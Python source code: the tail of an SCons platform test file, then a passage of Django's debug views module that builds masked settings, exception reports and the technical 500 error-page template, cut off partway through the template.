t = SCons.Platform.TempFileMunge(defined_cmd)
env = SCons.Environment.SubstitutionEnvironment(tools=[])
# Setting the line length high enough...
env['MAXLINELENGTH'] = 1024
env['VERY'] = 'test'
env['OVERSIMPLIFIED'] = 'command'
env['TEMPFILEARGJOINBYTE'] = os.linesep
expanded_cmd = env.subst(defined_cmd)
# For tempfilemunge to operate.
old_actions = SCons.Action.print_actions
SCons.Action.print_actions = 0
env['MAXLINELENGTH'] = len(expanded_cmd)-1
cmd = t(None, None, env, 0)
# print("CMD is:%s"%cmd)
with open(cmd[-1],'rb') as f:
file_content = f.read()
# print("Content is:[%s]"%file_content)
# ...and restoring its setting.
SCons.Action.print_actions = old_actions
assert file_content != env['TEMPFILEARGJOINBYTE'].join(['test','command','line'])
def test_tempfilecreation_once(self):
"""
Init class with cmd, such that the fully expanded
string reads "a test command line".
Note, how we're using a command string here that is
actually longer than the substituted one. This is to ensure
that the TempFileMunge class internally really takes the
length of the expanded string into account.
"""
defined_cmd = "a $VERY $OVERSIMPLIFIED line"
t = SCons.Platform.TempFileMunge(defined_cmd)
env = SCons.Environment.SubstitutionEnvironment(tools=[])
# Setting the line length high enough...
env['VERY'] = 'test'
env['OVERSIMPLIFIED'] = 'command'
expanded_cmd = env.subst(defined_cmd)
env['MAXLINELENGTH'] = len(expanded_cmd)-1
# Disable printing of actions...
old_actions = SCons.Action.print_actions
SCons.Action.print_actions = 0
# Create an instance of object derived class to allow setattrb
class Node:
class Attrs:
pass
def __init__(self):
self.attributes = self.Attrs()
target = [Node()]
cmd = t(target, None, env, 0)
# ...and restoring its setting.
SCons.Action.print_actions = old_actions
assert cmd != defined_cmd, cmd
assert cmd == target[0].attributes.tempfile_cmdlist[defined_cmd]
class PlatformEscapeTestCase(unittest.TestCase):
def test_posix_escape(self):
""" Check that paths with parens are escaped properly
"""
import SCons.Platform.posix
test_string = "/my (really) great code/main.cpp"
output = SCons.Platform.posix.escape(test_string)
# We expect the escape function to wrap the string
# in quotes, but not escape any internal characters
        # in the test_string. (Parens don't require shell
        # escaping if they're quoted.)
assert output[1:-1] == test_string
if __name__ == "__main__":
unittest.main()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_0_25196
|
from __future__ import unicode_literals
import re
import sys
import types
from django.conf import settings
from django.http import HttpResponse, HttpResponseNotFound
from django.template import Context, Engine, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.urls import Resolver404, resolve
from django.utils import lru_cache, six, timezone
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
# Minimal Django templates engine to render the error templates
# regardless of the project's TEMPLATES setting.
DEBUG_ENGINE = Engine(debug=True)
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE', flags=re.IGNORECASE)
CLEANSED_SUBSTITUTE = '********************'
class CallableSettingWrapper(object):
""" Object to wrap callable appearing in settings
* Not to call in the debug page (#21345).
* Not to break the debug page if the callable forbidding to set attributes (#23070).
"""
def __init__(self, callable_setting):
self._wrapped = callable_setting
def __repr__(self):
return repr(self._wrapped)
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = {k: cleanse_setting(k, v) for k, v in value.items()}
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
if callable(cleansed):
# For fixing #21345 and #23070
cleansed = CallableSettingWrapper(cleansed)
return cleansed
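# Illustrative example (added for clarity, not part of the original module):
# keys matching HIDDEN_SETTINGS are replaced, nested dicts are cleansed
# recursively, and non-sensitive values pass through unchanged.
def _example_cleanse_setting():
    cleansed = cleanse_setting('DATABASES', {'default': {'PASSWORD': 'hunter2', 'NAME': 'app'}})
    # cleansed == {'default': {'PASSWORD': CLEANSED_SUBSTITUTE, 'NAME': 'app'}}
    return cleansed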
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb, status_code=500):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponse(text, status=status_code, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponse(html, status=status_code, content_type='text/html')
@lru_cache.lru_cache()
def get_default_exception_reporter_filter():
# Instantiate the default filter for the first time and cache it.
return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
def get_exception_reporter_filter(request):
default_filter = get_default_exception_reporter_filter()
return getattr(request, 'exception_reporter_filter', default_filter)
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(tb_frame.f_locals.items())
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
try:
# If value is lazy or a complex object of another kind, this check
# might raise an exception. isinstance checks that lazy
# MultiValueDicts will have a return value.
is_multivalue_dict = isinstance(value, MultiValueDict)
except Exception as e:
return '{!r} while evaluating {!r}'.format(e, value)
if is_multivalue_dict:
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper' and
'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper' and
'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = getattr(self.exc_value, 'template_debug', None)
self.template_does_not_exist = False
self.postmortem = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"""Return a dictionary containing traceback information."""
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
self.template_does_not_exist = True
self.postmortem = self.exc_value.chain or [self.exc_value]
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame_vars = []
for k, v in frame['vars']:
v = pprint(v)
                    # The force_escape filter assumes unicode; make sure that works
if isinstance(v, six.binary_type):
v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input
# Trim large blobs of data
if len(v) > 4096:
v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v))
frame_vars.append((k, force_escape(v)))
frame['vars'] = frame_vars
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = force_text(
unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))],
'ascii', errors='replace'
)
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST_items': self.filter.get_post_parameters(self.request).items(),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': timezone.now(),
'django_version_info': get_version(),
'sys_path': sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'postmortem': self.postmortem,
}
if self.request is not None:
c['request_GET_items'] = self.request.GET.items()
c['request_FILES_items'] = self.request.FILES.items()
c['request_COOKIES_items'] = self.request.COOKIES.items()
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = force_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE)
c = Context(self.get_traceback_data(), use_l10n=False)
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE)
c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False)
return t.render(c)
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno + 1:upper_bound]
return lower_bound, pre_context, context_line, post_context
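    # Hedged illustration of the PEP-263 handling above: a file whose second
    # line is b"# -*- coding: latin-1 -*-" is decoded as latin-1, while files
    # without a coding cookie fall back to "ascii" with errors="replace".
    # For example (path and line number are made up):
    #
    #     lower, pre, line, post = self._get_lines_from_file(path, 41, 7)
    #     # -> pre covers source indices 34-40, line is index 41, and post
    #     #    covers indices 42-47 (0-based, as passed by the caller below)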
def get_traceback_frames(self):
def explicit_or_implicit_cause(exc_value):
explicit = getattr(exc_value, '__cause__', None)
implicit = getattr(exc_value, '__context__', None)
return explicit or implicit
# Get the exception and all its causes
exceptions = []
exc_value = self.exc_value
while exc_value:
exceptions.append(exc_value)
exc_value = explicit_or_implicit_cause(exc_value)
frames = []
# No exceptions were supplied to ExceptionReporter
if not exceptions:
return frames
# In case there's just one exception (always in Python 2,
# sometimes in Python 3), take the traceback from self.tb (Python 2
# doesn't have a __traceback__ attribute on Exception)
exc_value = exceptions.pop()
tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(
filename, lineno, 7, loader, module_name,
)
if pre_context_lineno is not None:
frames.append({
'exc_cause': explicit_or_implicit_cause(exc_value),
'exc_cause_explicit': getattr(exc_value, '__cause__', True),
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
            # If the traceback for the current exception is consumed, move on
            # to the next exception in the chain.
if six.PY2:
tb = tb.tb_next
elif not tb.tb_next and exceptions:
exc_value = exceptions.pop()
tb = exc_value.__traceback__
else:
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
        trace_lines = ['Traceback (most recent call last):\n']
        trace_lines += traceback.format_list(tb)
        trace_lines += traceback.format_exception_only(self.exc_type, self.exc_value)
        return trace_lines
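# Hedged usage sketch (illustrative only; assumes a configured Django settings
# module, since the reporter filter reads settings while cleansing frames):
# ExceptionReporter is normally fed the output of sys.exc_info() from inside
# an except block.
def _exception_reporter_example():
    """Minimal sketch: format the currently handled exception as text lines."""
    import sys
    try:
        1 / 0
    except Exception:
        exc_type, exc_value, tb = sys.exc_info()
        reporter = ExceptionReporter(None, exc_type, exc_value, tb)
        return reporter.format_exception()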
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
error_url = exception.args[0]['path']
except (IndexError, TypeError, KeyError):
error_url = request.path_info[1:] # Trim leading slash
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried or ( # empty URLconf
request.path == '/' and
len(tried) == 1 and # default URLconf
len(tried[0]) == 1 and
getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin'
)):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
caller = ''
try:
resolver_match = resolve(request.path)
except Resolver404:
pass
else:
obj = resolver_match.func
if hasattr(obj, '__name__'):
caller = obj.__name__
elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
caller = obj.__class__.__name__
if hasattr(obj, '__module__'):
module = obj.__module__
caller = '%s.%s' % (module, caller)
t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE)
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': error_url,
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
'raising_view_name': caller,
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE)
c = Context({
"title": _("Welcome to Django"),
"heading": _("It worked!"),
"subheading": _("Congratulations on your first Django-powered page."),
"instructions": _(
"Of course, you haven't actually done any work yet. "
"Next, start your first app by running <code>python manage.py startapp [app_label]</code>."
),
"explanation": _(
"You're seeing this message because you have <code>DEBUG = True</code> in your "
"Django settings file and you haven't configured any URLs. Get to work!"
),
})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = ("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
r"""{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.textContent = s.textContent == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.textContent = link.textContent.trim() == s1 ? s2: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">"""
"""{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}"""
"""</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.get_raw_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if postmortem %}
<p class="append-bottom">Django tried loading these templates, in this order:</p>
{% for entry in postmortem %}
<p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p>
<ul>
{% if entry.tried %}
{% for attempt in entry.tried %}
<li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li>
{% endfor %}
{% else %}
<li>This engine did not provide a list of tried templates.</li>
{% endif %}
</ul>
{% endfor %}
{% else %}
<p>No templates were found because your 'TEMPLATES' setting is not configured.</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}
{% if template_info.bottom != template_info.total %} cut-bottom{% endif %}">
{% for source_line in template_info.source_lines %}
{% if source_line.0 == template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}"""
"""<span class="specific">{{ template_info.during }}</span>"""
"""{{ template_info.after }}</td>
</tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endif %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>{% endif %}
</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
<li><h3>
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
</h3></li>
{% endif %}{% endifchanged %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">
{% for line in frame.pre_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line">
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>
""" """{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">
{% for line in frame.post_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:0 %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.get_raw_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{% if settings.MIDDLEWARE is not None %}{{ settings.MIDDLEWARE|pprint }}"""
"""{% else %}{{ settings.MIDDLEWARE_CLASSES|pprint }}{% endif %}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %}"""
""" * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}"""
"{% for source_line in template_info.source_lines %}"
"{% if source_line.0 == template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endif %}{% endfor %}{% endif %}
Traceback:{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}{% endif %}{% endifchanged %}
File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public website">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
{% if request.user %}
<h3 id="user-info">USER</h3>
<p>{{ request.user }}</p>
{% endif %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in request_GET_items %}
<tr>
